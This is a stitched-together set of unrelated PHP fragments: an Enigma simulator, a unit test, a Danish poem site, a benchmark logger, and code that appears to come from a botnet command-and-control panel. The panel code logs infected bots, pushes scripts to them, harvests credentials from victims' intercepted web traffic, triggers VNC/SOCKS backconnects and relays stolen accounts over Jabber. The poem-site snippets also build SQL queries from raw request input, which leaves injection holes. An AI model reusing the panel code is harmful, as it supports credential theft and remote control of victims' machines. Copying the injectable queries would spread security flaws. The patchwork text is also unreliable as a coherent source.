public function addCable($a, $b) { $aPosition = toInt($a); $bPosition = toInt($b); $this->plugs[$aPosition] = $bPosition; $this->plugs[$bPosition] = $aPosition; return $this; }
private function getProcessedReversedMapping($mapping) { $output = $mapping; for ($i = 0; $i < count($mapping); $i++) { $output[toInt($mapping[$i])] = toChar($i); } return $output; }
public function testToInt() { $this->assertEquals(4, toInt(4)); $this->assertEquals(-4, toInt(-4)); $this->assertNull(toInt(4.1)); $this->assertNull(toInt(4.9)); $this->assertEquals(0, toInt('somestring')); $this->assertNull(toInt([])); $this->assertEquals(0, toInt(0)); }
function try_handle_slet_digt_submit() { global $user_message; if (!isset($_POST['action'])) { return; } if ($_POST['action'] === "slet") { $did = toInt($_POST['did']); //saving the poem $query = query("DELETE FROM digte WHERE uid = " . module()->getUserId() . " AND id = " . $did); //the password was changed successful $user_message = "Digtet er nu sletet."; } }
/** * */ function doActualLogin($id, $username, $usertype) { //ensure session is started. session_start(); session_regenerate_id(true); //priveleges are changing, so the sessionid is regenerated. $_SESSION = array(); //Så der ikke ligger noget og roder. $_SESSION['userid'] = toInt($id); $_SESSION['username'] = $username; $_SESSION['usertype'] = $usertype; }
if (!createDir($file_path) || !($h = fopen($file_path . '/reports.txt', 'ab'))) { die; } flock($h, LOCK_EX); fwrite($h, str_repeat("=", 80) . "\r\n" . "bot_id={$botId}\r\n" . "botnet={$botnet}\r\n" . "bot_version=" . intToVersion($botVersion) . "\r\n" . "ipv4={$realIpv4}\r\n" . "country={$country}\r\n" . "type={$type}\r\n" . "rtime=" . gmdate('H:i:s d.m.Y', $curTime) . "\r\n" . "time_system=" . (empty($list[SBCID_TIME_SYSTEM]) ? 0 : gmdate('H:i:s d.m.Y', toInt($list[SBCID_TIME_SYSTEM]))) . "\r\n" . "time_tick=" . (empty($list[SBCID_TIME_TICK]) ? 0 : tickCountToText(toUint($list[SBCID_TIME_TICK]) / 1000)) . "\r\n" . "time_localbias=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : timeBiasToText(toInt($list[SBCID_TIME_LOCALBIAS]))) . "\r\n" . "os_version=" . (empty($list[SBCID_OS_INFO]) ? '' : osDataToString($list[SBCID_OS_INFO])) . "\r\n" . "language_id=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . "\r\n" . "process_name=" . (empty($list[SBCID_PROCESS_NAME]) ? '' : $list[SBCID_PROCESS_NAME]) . "\r\n" . "process_user="******"\r\n" . "path_source=" . (empty($list[SBCID_PATH_SOURCE]) ? '' : $list[SBCID_PATH_SOURCE]) . "\r\n" . "context=\r\n" . $list[SBCID_BOTLOG] . "\r\n\r\n\r\n"); flock($h, LOCK_UN); fclose($h); } if ($config['reports_jn'] === 1) { imNotify($type, $list, $botId); } } } else { if (!empty($list[SBCID_NET_LATENCY])) { //Стандартный запрос. $query = "`bot_id`='{$botIdQ}', `botnet`='{$botnetQ}', `bot_version`={$botVersion}, `country`='{$countryQ}', `rtime_last`={$curTime}, " . "`net_latency`=" . (empty($list[SBCID_NET_LATENCY]) ? 0 : toUint($list[SBCID_NET_LATENCY])) . ", " . "`tcpport_s1`=" . (empty($list[SBCID_TCPPORT_S1]) ? 0 : toUshort($list[SBCID_TCPPORT_S1])) . ", " . "`time_localbias`=" . (empty($list[SBCID_TIME_LOCALBIAS]) ? 0 : toInt($list[SBCID_TIME_LOCALBIAS])) . ", " . "`os_version`='" . (empty($list[SBCID_OS_INFO]) ? '' : addslashes($list[SBCID_OS_INFO])) . "', " . "`language_id`=" . (empty($list[SBCID_LANGUAGE_ID]) ? 0 : toUshort($list[SBCID_LANGUAGE_ID])) . ", " . "`ipv4_list`='" . (empty($list[SBCID_IPV4_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV4_ADDRESSES])) . "', " . "`ipv6_list`='" . (empty($list[SBCID_IPV6_ADDRESSES]) ? '' : addslashes($list[SBCID_IPV6_ADDRESSES])) . "', " . "`ipv4`='" . addslashes(pack('N', ip2long($realIpv4))) . "'"; if (!mysqlQueryEx('botnet_list', "INSERT INTO `botnet_list` SET `comment`='', `rtime_first`={$curTime}, `rtime_online`={$curTime}, {$query} " . "ON DUPLICATE KEY UPDATE `rtime_online`=IF(`rtime_last` <= " . ($curTime - $config['botnet_timeout']) . ", {$curTime}, `rtime_online`), {$query}")) { die; } unset($query); //Поиск скриптов для отправки. $replyData = ''; $replyCount = 0; $botIdQm = toSqlSafeMask($botIdQ); $botnetQm = toSqlSafeMask($botnetQ); $countryQm = toSqlSafeMask($countryQ); $r = mysqlQueryEx('botnet_scripts', "SELECT `extern_id`, `script_bin`, `send_limit`, `id` FROM `botnet_scripts` WHERE `flag_enabled`=1 AND " . "(`countries_wl`='' OR `countries_wl` LIKE BINARY '%{$countryQm}%') AND " . "(`countries_bl` NOT LIKE BINARY '%{$countryQm}%') AND " . "(`botnets_wl`='' OR `botnets_wl` LIKE BINARY '%{$botnetQm}%') AND " . "(`botnets_bl` NOT LIKE BINARY '%{$botnetQm}%') AND " . "(`bots_wl`='' OR `bots_wl` LIKE BINARY '%{$botIdQm}%') AND " . "(`bots_bl` NOT LIKE BINARY '%{$botIdQm}%') " . "LIMIT 10"); if ($r) { while ($m = mysql_fetch_row($r)) { $eid = addslashes($m[0]); //Проверяем, не достигнут ли лимит.
/** Parse accounts * 0. Only BLT_HTTP_REQUEST & BLT_HTTPS_REQUEST against $list[SBCID_BOTLOG_TYPE] * 1. If Match URL masks against $list[SBCID_PATH_SOURCE] * 2. If Match params mask against $list[SBCID_BOTLOG] * 3. Store into the DB (no dups) * 4. Autoconnect VNC|SOCKS when set * 5. Jabber-notify if configured */ function accparseplugin_parselog($list, $botId) { /* Only for HTTP[S] */ $type = toInt($list[SBCID_BOTLOG_TYPE]); if ($type != BLT_HTTP_REQUEST && $type != BLT_HTTPS_REQUEST) { return; } /* Match the URL */ $matched_rule = null; $R = mysql_query('SELECT * FROM `accparse_rules` WHERE `enabled`=1 ORDER BY NULL;'); while ($R && !is_bool($r = mysql_fetch_assoc($R))) { $wildcart = '~^' . str_replace('\\*', '.*', preg_quote(trim($r['url']), '~')) . '$~i'; if (preg_match($wildcart, $list[SBCID_PATH_SOURCE])) { $matched_rule = $r; mysql_free_result($R); break; } } if (is_null($matched_rule)) { return; } GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule matched: ' . $matched_rule['alias']); /* Match the params */ $matched_params = array(); foreach (explode("\n", $matched_rule['params']) as $param) { $param = rtrim(trim($param), '='); $wildcart = '~^(' . str_replace('\\*', '.*', preg_quote($param, '~')) . ')=(.+)$~ium'; if (preg_match_all($wildcart, $list[SBCID_BOTLOG], $matches, PREG_SET_ORDER)) { foreach ($matches as $m) { $matched_params[urldecode($m[1])] = urldecode($m[2]); } } } if (count($matched_params) == 0) { return; } GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Rule params also matched: ' . count($matched_params)); /* String-format */ $matched_account = ''; asort($matched_params); foreach ($matched_params as $k => $v) { $matched_account .= "{$k}={$v}\n"; } /* Store */ $q_botId = mysql_real_escape_string($botId); $q_bot_info = mysql_real_escape_string(implode("\n", array(basename($list[SBCID_PROCESS_NAME])))); $q_ruleid = $matched_rule['id']; $q_account = mysql_real_escape_string($matched_account); $q_acc_hash = md5(implode($matched_params)); $q_mtime = time(); mysql_query("INSERT INTO `accparse_accounts` VALUES(NULL, '{$q_botId}', '{$q_bot_info}', {$q_ruleid}, '{$q_account}', '{$q_acc_hash}', {$q_mtime}, 0, '') ON DUPLICATE KEY UPDATE `mtime`={$q_mtime};"); /* Dupecheck */ $affected = mysql_affected_rows(); $duplicate_account = $affected == 2; # INSERT gives 1, UPDATE gives 2. This magic should work :) GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account ' . ($duplicate_account ? 'updated' : 'added')); /* Autoconnect option */ if ($matched_rule['autoconnect']) { if (function_exists('vncplugin_autoconnect')) { $q_protocol = $matched_rule['autoconnect']; GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Account backconnect: protocol=' . $q_protocol); mysql_query("INSERT INTO `vnc_bot_connections` VALUES('{$q_botId}', {$q_protocol}, 1, 0, 0, 0) ON DUPLICATE KEY UPDATE `protocol`={$q_protocol}, `ctime`=0, `do_connect`=IF(`do_connect`=0,1,`do_connect`);"); vncplugin_autoconnect($botId); } } /* Notify */ if ($duplicate_account) { return; } # do nothing else if ($matched_rule['notify'] && !empty($GLOBALS['config']['accparse_jid'])) { $message = sprintf("Account-Parser match: %s (URL: %s)\n", $matched_rule['alias'], $matched_rule['url']); $message .= sprintf("BotID: %s\n", $botId); $message .= sprintf("Browser: %s\n", $list[SBCID_PROCESS_NAME]); $message .= sprintf("URL: %s\n", $list[SBCID_PATH_SOURCE]); $message .= "\n"; $message .= strlen($matched_account) > 100 ? substr($matched_account, 0, 100) . "\n...(see in the admin)" : $matched_account; GateLog::get()->log(GateLog::L_TRACE, 'plugin.accparse', 'Jabber notify: ' . $GLOBALS['config']['accparse_jid']); jabber_notify($GLOBALS['config']['accparse_jid'], $message); } }
public function reflect($c) { return $this->mapping[toInt($c)]; }
\t\t\t\t\t\t\t<th> \t\t\t\t\t\t\t\tTitel \t\t\t\t\t\t\t</th> \t\t\t\t\t\t\t<th> \t\t\t\t\t\t\t\tForfatter \t\t\t\t\t\t\t</th> \t\t\t\t\t\t</tr> ASDF; echo $header; $query = query("SELECT as did, d.titel, d.tekst, d.likes, as uid, u.username FROM digte as d, users as u WHERE d.uid = ORDER BY created DESC "); while ($row = $query->fetch_array()) { $did = html_escape($row['did']); $uid = html_escape($row['uid']); $enc_titel = html_escape($row['titel']); $enc_username = html_escape($row['username']); $likes = toInt($row['likes']); $html = <<<ASDF \t\t\t\t\t\t<tr> \t\t\t\t\t\t\t<td> \t\t\t\t\t\t\t\t{$likes} \t\t\t\t\t\t\t</td> \t\t\t\t\t\t\t<td> \t\t\t\t\t\t\t\t<a href="digte_vis_digt.php?did={$did}" >{$enc_titel}</a> \t\t\t\t\t\t\t</td> \t\t\t\t\t\t\t<td> \t\t\t\t\t\t\t\t{$enc_username} \t\t\t\t\t\t\t</td> \t\t\t\t\t\t</tr> ASDF; echo $html; }
<?php require "_conf_for_pages.php"; $did = toInt($_GET['did']); $query = query("SELECT * FROM digte WHERE uid = " . module()->getUserId() . " AND id = " . $did); $row = $query->fetch_array(); $titel = $row['titel']; ?> <!DOCTYPE html> <html> <?php echo get_html_head(); ?> <body> <div class="container"> <?php echo get_body_header("user_profile"); ?> <h1>Profile - digte</h1> <?php echo page_profile_topmenu(); ?> <br><br> Er du sikker på du vil slette dette digt?<br> <br> <b><?php
<?php require "_conf_for_pages.php"; $did = toInt($_GET["did"]); try_handle_change_nyt_digt_submit(); /** * */ function try_handle_change_nyt_digt_submit() { global $user_message; if (isset($_POST['titel'])) { $titel = $_POST['titel']; $tekst = $_POST['tekst']; $did = $_POST['did']; $uid = module()->getUserid(); //saving the poem $query = query("INSERT INTO digt_kommentarer (did, uid, titel, tekst) VALUES ({$did}, " . module()->loginController->getUserid() . ", '" . db()->escape_string($titel) . "', '" . db()->escape_string($tekst) . "')"); //the password was changed successful $user_message = "Din kommentar er gemt."; } } ?> <!DOCTYPE html> <html> <?php echo get_html_head(); ?> <body> <div class="container">
function digt_row_to_html($row, $max_lines = null) { //variabler $did = html_escape($row['did']); $enc_titel = html_escape($row['titel']); $enc_username = html_escape($row['username']); $likes = toInt($row['likes']); //digt tekst skal kun være et par linier. $tekst = $row['tekst']; $length = strlen($tekst); $kort_tekst = ""; $nl_count = 0; for ($i = 0; $i < $length; $i++) { if ($tekst[$i] === "\n") { $nl_count++; if (isset($max_lines) && $nl_count >= $max_lines) { break; } } $kort_tekst .= $tekst[$i]; } $enc_tekst = html_escape($kort_tekst); //vote up link skal være forskellige afhængig af om man er logget ind. if (module()->userLoggedIn()) { $like_function = "vote_up_digt"; } else { $like_function = "sign_up_to_vote"; } $html = <<<ASDF <pre> <b>{$enc_titel}</b> {$enc_tekst} Af {$enc_username} <span class="digt_like"><a href="#" onclick="{$like_function}({$did}); return false;" ><img src="images/like_triangle.gif" height="7" width="10" alt="Like this poem." ></a>{$likes}</span></pre> ASDF; return $html; }
<?php require "_conf_for_ajax.php"; //handles ajax if (isset($_POST['ajax'])) { $did = toInt($_POST['did']); $uid = module()->getUserid(); //Er dette digt allerede liked af den bruger $query = query("SELECT * FROM like_register WHERE did = {$did} and uid = {$uid}"); $vote_exists = $query->num_rows !== 0; //vote up or down $increment = $vote_exists ? "-1" : "+1"; $query = query("UPDATE digte SET likes = likes {$increment} WHERE id = '" . $did . "'"); //update vote register if ($vote_exists) { query("DELETE FROM like_register WHERE did = {$did} and uid = {$uid}"); } else { query("INSERT INTO like_register (did, uid) VALUES ({$did}, {$uid})"); } //end ajax request echo "ok"; exit; }
$uname = trimString($data["uname"], 255); $S_SID = getMagic($os . "_" . $platform . "_" . $uname, 768); $S_ID = getSQLID($conn, "select S_ID from System where S_SID=? LIMIT 1", $S_SID); if ($S_ID == 0) { // this operating system is not in the database $sql = $conn->prepare("INSERT INTO System (S_SID, Platform, OS, Uname) VALUES (?, ?, ?, ?) ON DUPLICATE KEY UPDATE S_SID=S_SID"); if (!$sql) { dieSQL(); } $sql->bind_param("ssss", $S_SID, $platform, $os, $uname); $sql->execute(); $sql->close(); $S_ID = $conn->insert_id; if ($S_ID == 0) { $S_ID = getSQLID($conn, "select S_ID from System where S_SID=? LIMIT 1", $S_SID); } } // we can now add all of this information to the runlog if ($C_ID == 0 or $P_ID == 0 or $V_ID == 0 or $S_ID == 0) { die("Something went wrong adding data: {$C_ID}, {$P_ID}, {$V_ID}, {$S_ID}"); } $exe = trimString($data["executable"], 255); $clockspeed = toNum($data["clockspeed"], 0); $numcores = toInt($data["numcores"], 0); $sql = $conn->prepare("INSERT INTO RunLog (RunTime, C_ID, Executable, P_ID, S_ID, V_ID, NumCores, ClockSpeed) VALUES (now(), ?, ?, ?, ?, ?, ?, ?)"); if (!$sql) { dieSQL(); } $sql->bind_param("isiiiid", $C_ID, $exe, $P_ID, $S_ID, $V_ID, $numcores, $clockspeed); $sql->execute(); $sql->close();